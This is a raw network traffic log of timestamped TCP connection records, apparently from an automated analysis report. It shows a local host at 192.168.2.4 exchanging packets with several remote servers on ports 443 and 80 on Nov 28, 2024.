                                                                                                                                          Nov 28, 2024 11:33:06.363614082 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.367862940 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.367928982 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.371522903 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.371591091 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.376334906 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.376408100 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.426845074 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.426949978 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.430104017 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.430171013 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.433896065 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.433967113 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.527987957 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.528053999 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.530782938 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.530847073 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.534264088 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.534324884 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.537674904 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.537735939 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.542711973 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.542776108 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.545499086 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.545567989 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.548928976 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.548991919 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.552437067 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.552510023 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.556869984 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.556935072 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.560347080 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.560408115 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.564240932 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.564311028 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.567725897 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.567785978 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.571074009 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.571132898 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.575577021 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.575635910 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.629988909 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.630053043 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.633527994 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.633591890 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.636835098 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.636904955 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.708089113 CET44349853142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.708398104 CET49853443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:33:06.708414078 CET44349853142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.708779097 CET44349853142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.709100962 CET49853443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:33:06.709161997 CET44349853142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.733279943 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.733357906 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.734364033 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.734419107 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.734428883 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.734440088 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.734486103 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.734627962 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.734635115 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.735255003 CET49860443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.735279083 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.735333920 CET49860443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.736068010 CET49860443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.736079931 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.762005091 CET49853443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:33:06.777878046 CET4434985213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.777942896 CET4434985213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.777987957 CET49852443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:06.778167963 CET49852443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:06.778182983 CET4434985213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.778192997 CET49852443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:06.778198957 CET4434985213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.781332016 CET49861443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:06.781352043 CET4434986113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.781409025 CET49861443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:06.781610966 CET49861443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:06.781625032 CET4434986113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.804935932 CET443498565.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.805197954 CET49856443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.805213928 CET443498565.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.805635929 CET443498565.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.806094885 CET49856443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.806164026 CET443498565.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.806417942 CET49856443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.851335049 CET443498565.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.918427944 CET4972480192.168.2.493.184.221.240
                                                                                                                                          Nov 28, 2024 11:33:07.023166895 CET4434985513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.025285006 CET49855443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.025316954 CET4434985513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.025747061 CET49855443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.025753975 CET4434985513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.041070938 CET804972493.184.221.240192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.041136980 CET4972480192.168.2.493.184.221.240
                                                                                                                                          Nov 28, 2024 11:33:07.164975882 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.165294886 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.165319920 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.165661097 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.166043997 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.166105986 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.166232109 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.211323977 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.356275082 CET443498565.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.356302977 CET443498565.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.356375933 CET443498565.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.356404066 CET49856443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.356452942 CET49856443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.358129025 CET49856443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.358146906 CET443498565.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.361222982 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.361263037 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.361367941 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.361685991 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.361701965 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.473613977 CET4434985913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.474258900 CET49859443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.474276066 CET4434985913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.474699020 CET49859443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.474703074 CET4434985913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.477431059 CET4434985513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.477499008 CET4434985513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.477688074 CET49855443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.477725983 CET49855443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.477749109 CET4434985513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.477758884 CET49855443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.477765083 CET4434985513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.482639074 CET49863443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.482681990 CET4434986313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.482773066 CET49863443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.483001947 CET49863443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.483016014 CET4434986313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.530607939 CET4434985413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.531061888 CET49854443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.531088114 CET4434985413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.531523943 CET49854443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.531529903 CET4434985413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.537774086 CET4434985813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.538120985 CET49858443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.538136005 CET4434985813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.538476944 CET49858443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.538482904 CET4434985813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.734996080 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.735022068 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.735161066 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.735186100 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.751773119 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.751863956 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.751876116 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.751919985 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.752345085 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.752384901 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.752548933 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.752607107 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.752620935 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.755824089 CET49864443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.755866051 CET443498645.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.755959034 CET49864443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.756221056 CET49864443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:07.756238937 CET443498645.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.908737898 CET4434985913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.908797026 CET4434985913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.908891916 CET49859443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.909111977 CET49859443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.909126043 CET4434985913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.909136057 CET49859443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.909141064 CET4434985913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.912482023 CET49865443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.912519932 CET4434986513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:07.912615061 CET49865443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.912784100 CET49865443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:07.912801981 CET4434986513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.027930021 CET4434985813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.027930975 CET4434985413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.028031111 CET4434985813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.028037071 CET4434985413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.028163910 CET49858443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.028673887 CET49854443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.028675079 CET49858443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.028690100 CET4434985813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.028703928 CET49858443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.028709888 CET4434985813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.030008078 CET49854443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.030013084 CET4434985413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.030025005 CET49854443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.030029058 CET4434985413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.045211077 CET49866443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.045255899 CET4434986613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.045372009 CET49866443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.045388937 CET49867443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.045407057 CET4434986713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.045485973 CET49866443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.045495033 CET4434986613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.045509100 CET49867443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.045670986 CET49867443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.045686007 CET4434986713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.234431028 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.234791994 CET49860443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:08.234807968 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.235140085 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.235557079 CET49860443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:08.235609055 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.235724926 CET49860443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:08.279333115 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.539052010 CET4434986113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.539608955 CET49861443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.539628983 CET4434986113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.540083885 CET49861443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.540090084 CET4434986113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.624346018 CET44349740167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.624416113 CET44349740167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.624473095 CET49740443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:33:08.861702919 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.862129927 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:08.862160921 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.862561941 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.862629890 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:08.863322973 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.863388062 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:08.863677025 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:08.863739967 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.863954067 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:08.863970995 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.916867971 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:08.977489948 CET4434986113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.977564096 CET4434986113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.977694035 CET49861443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.977890968 CET49861443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.977902889 CET4434986113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.977916002 CET49861443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.977922916 CET4434986113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.981801987 CET49868443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.981843948 CET4434986813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:08.981976986 CET49868443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.982151031 CET49868443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:08.982165098 CET4434986813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.033745050 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.033771992 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.033896923 CET49860443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.033909082 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.042088032 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.042143106 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.042167902 CET49860443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.042222023 CET49860443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.042418957 CET49860443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.042424917 CET443498605.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.043129921 CET49869443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.043173075 CET443498695.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.043354034 CET49869443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.044265032 CET49869443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.044287920 CET443498695.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.046613932 CET49740443192.168.2.4167.89.123.16
                                                                                                                                          Nov 28, 2024 11:33:09.046641111 CET44349740167.89.123.16192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.238594055 CET443498645.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.238972902 CET49864443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.239056110 CET443498645.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.239420891 CET443498645.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.239773035 CET49864443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.239830971 CET443498645.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.239908934 CET49864443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.264069080 CET4434986313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.264836073 CET49863443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:09.264866114 CET4434986313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.265305996 CET49863443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:09.265311956 CET4434986313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.287329912 CET443498645.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.435693979 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.435719013 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.435725927 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.435754061 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.435830116 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.435877085 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.435911894 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.481611013 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.521559954 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.521569967 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.521605015 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.521758080 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.629904985 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.629913092 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.629971027 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.629976034 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.630038977 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.630673885 CET49862443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.630683899 CET443498625.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.631103039 CET49870443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.631133080 CET443498705.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.631189108 CET49870443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.632134914 CET49870443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.632148981 CET443498705.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.708262920 CET4434986313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.708338022 CET4434986313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.708393097 CET49863443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:09.708703041 CET49863443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:09.708713055 CET4434986313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.708722115 CET49863443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:09.708728075 CET4434986313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.713824034 CET49871443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:09.713840008 CET4434987113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.713916063 CET49871443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:09.714149952 CET49871443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:09.714159966 CET4434987113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.811225891 CET443498645.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.811254978 CET443498645.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.811310053 CET49864443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:09.811331034 CET443498645.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.826176882 CET4434986713.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:09.826647997 CET49867443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:09.826664925 CET4434986713.107.246.63192.168.2.4
